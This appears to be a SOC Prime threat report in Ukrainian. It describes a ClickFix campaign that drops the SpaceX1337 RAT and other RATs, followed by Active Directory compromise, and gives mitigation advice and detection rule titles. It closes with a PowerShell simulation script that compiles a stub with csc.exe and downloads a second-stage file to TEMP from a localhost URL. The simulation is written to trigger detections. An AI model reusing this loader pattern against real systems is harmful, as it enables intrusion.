SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix призводить до компрометації AD з фізичним доступом до клавіатури

Author Photo
SOC Prime Team linkedin icon Стежити
SpaceX1337 ClickFix призводить до компрометації AD з фізичним доступом до клавіатури
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Противник використав фішингову приманку ClickFix для розгортання SpaceX1337 RAT, за яким слідувала багатоступенева інфекція, що включала стандартні RAT, такі як NetSupport, AsyncRAT і Remus. Атака розвивалась від автоматизованого викрадення облікових даних до інтерактивної діяльності з клавіатури, що спрямовується на Active Directory. Зрештою атакуючий спробував здійснити боковий рух до контролера домену та підбір облікових даних проти порталу VPN.

Розслідування

Вторгнення було зафіксовано в повністю інструментованій мережі пасток Active Directory, що забезпечувала наскрізну видимість через телеметрію EDR, Zeek та Suricata. Дослідники простежили активність від початкового PowerShell-завантажувача через широкі розвіддані ADSI/LDAP та бокові рухи по SMB. Розслідування чітко ідентифікувало перехід від автоматичного виконання шкідливого програмного забезпечення до прямої взаємодії людиною-оператором.

Пом’якшення

Організації повинні впровадити суворі контроли виконання PowerShell та моніторити підозрілі відносини процесів батько-дитина, включаючи explorer.exe запускає PowerShell. Команди безпеки повинні виявляти компіляцію на хості через csc.exe та зловживання LOLBins, таких як certutil or bitsadmin для зовнішніх завантажень. Також слід посилити Active Directory, видаливши чутливі дані з атрибутів LDAP і моніторивши аномальні запити LDAP.

Відповідь

Якщо виявлено підозрілу активність, реагуючі на інциденти повинні ізолювати постраждалі кінцеві точки та відкликати потенційно скомпрометовані облікові дані сервісних облікових записів та облікових записів домену. Розслідування повинно надавати пріоритет виявленню кількох родин RAT і перевірці на несанкціоновані заплановані завдання або модифікації реєстру. Логи VPN також повинні бути перевірені на спроби підбору облікових даних, що виходять з відомої шкідливої інфраструктури.

Потік Атаки

Виявлення

Виконання Python з підозрілих папок (через cmdline)

Команда SOC Prime
13 серпня 2026

Підозрілий запис RunMRU з семантикою LOLBin (через registry_event)

Команда SOC Prime
13 серпня 2026

Виконання команд на віддаленому хості за допомогою керування віддаленим сервером Windows (через cmdline)

Команда SOC Prime
13 серпня 2026

Можливе перерахування або маніпуляція обліковими записами чи групами (через cmdline)

Команда SOC Prime
13 серпня 2026

Підозріле виявлення довіри до домену (через cmdline)

Команда SOC Prime
13 серпня 2026

Можливе виявлення конфігурації мережі системи (через cmdline)

Команда SOC Prime
13 серпня 2026

Підозріле виконавче ім’я, що містить лише цифри в назві (через cmdline)

Команда SOC Prime
13 серпня 2026

Завдання LOLBAS Schtasks (через cmdline)

Команда SOC Prime
13 серпня 2026

Використання Certutil для кодування даних і операцій сертифікатів (через cmdline)

Команда SOC Prime
13 серпня 2026

LOLBAS Bitsadmin (через cmdline)

Команда SOC Prime
13 серпня 2026

Можливе дампування SAM/SYSTEM/SECURITY (через cmdline)

Команда SOC Prime
13 серпня 2026

Виклик підозрілих методів .NET з PowerShell (через powershell)

Команда SOC Prime
13 серпня 2026

Підозріле спілкування з доменом Trycloudflare (через dns)

Команда SOC Prime
13 серпня 2026

Можливі спроби комунікацій з доменом для перевірки IP (через dns)

Команда SOC Prime
13 серпня 2026

IOC (HashSha256) для виявлення: Від ClickFix SpaceX1337 до атаки на AD з клавіатурою

Правила AI SOC Prime
13 серпня 2026

IOC (HashMd5) для виявлення: Від ClickFix SpaceX1337 до атаки на AD з клавіатурою

Правила AI SOC Prime
13 серпня 2026

IOC (SourceIP) для виявлення: Від ClickFix SpaceX1337 до атаки на AD з клавіатурою

Правила AI SOC Prime
13 серпня 2026

IOC (DestinationIP) для виявлення: Від ClickFix SpaceX1337 до атаки на AD з клавіатурою

Правила AI SOC Prime
13 серпня 2026

Високоточне правило Sigma для комунікації SpaceX1337 та AdaptixC2 [Підключення до мережі Windows]

Правила AI SOC Prime
13 серпня 2026

Виявлення компіляції маяка AdaptixC2 та PowerShell Loader [Створення процесу Windows]

Правила AI SOC Prime
13 серпня 2026

Виконання симуляції

Попередня умова: Перед польотна перевірка телеметрії та базового значення повинна бути затверджена.

Обґрунтування: Цей розділ описує точне виконання техніки супротивника (TTP), розробленої для виклику правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані технології та прагнути генерації точної телеметрії, очікуваної логікою виявлення. Абстрактні або нерелевантні приклади можуть призвести до помилкових діагнозів.

  • Наратив і команди атаки: Противник отримав початковий доступ через фішингове посилання. Щоб уникнути потрапляння відомого шкідливого .exe на диск, вони розміщують невеликий .cs вихідний файл. Потім вони викликають csc.exe для компіляції цього вихідного коду у функціональний Windows виконавчий файл (svc.exe), розташований в %TEMP% каталозі. Відразу після компіляції атакуючий використовує PowerShell для завантаження другого етапу завантажувача з віддаленого C2 сервера (симульованого через локальний слухач) з використанням iwr (Invoke-WebRequest) псевдоніма, зберігаючи його в тимчасовій папці, щоб завершити процес стажування.

  • Скрипт регресійного тесту:

    # 1. Створити фіктивний вихідний файл C#, щоб симулювати вихідний код AdaptixC2
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simulated Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. Симулювати компіляцію csc.exe (Тригери selection_csc)
    # Примітка: Ми використовуємо точні прапори, зазначені в логіці виявлення
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. Симулювати завантаження PowerShell (Тригери selection_powershell)
    # Ми використовуємо 'iwr' та конкретний шлях OutFile для відповідності логіці
    # Використовуючи неіснуючий URL, щоб уникнути фактичного мережевого трафіку, але командний рядок буде відповідати
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • Команди очищення:

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue